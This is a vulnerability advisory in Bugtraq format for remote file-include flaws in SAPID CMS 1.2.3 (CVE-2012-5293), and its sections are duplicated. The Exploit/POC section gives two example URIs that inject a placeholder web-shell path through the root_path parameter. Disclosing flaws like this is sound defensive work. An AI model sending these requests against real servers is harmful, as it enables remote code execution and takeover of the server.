SAPID CMS Multiple Remote File Include Vulnerabilities
BID:51323
Info
SAPID CMS Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 51323 |
| Class: | Input Validation Error |
| CVE: |
CVE-2012-5293 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 09 2012 12:00AM |
| Updated: | Oct 08 2012 06:40PM |
| Credit: | Opa Yong |
| Vulnerable: |
Sapid CMS 1.2.3 |
| Not Vulnerable: | |
Discussion
SAPID CMS Multiple Remote File Include Vulnerabilities
SAPID CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
SAPID CMS 1.2.3 is vulnerable; other versions may also be affected.
SAPID CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
SAPID CMS 1.2.3 is vulnerable; other versions may also be affected.
Exploit / POC
SAPID CMS Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?]
http://www.example.com/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?]
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?]
http://www.example.com/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?]
Solution / Fix
SAPID CMS Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].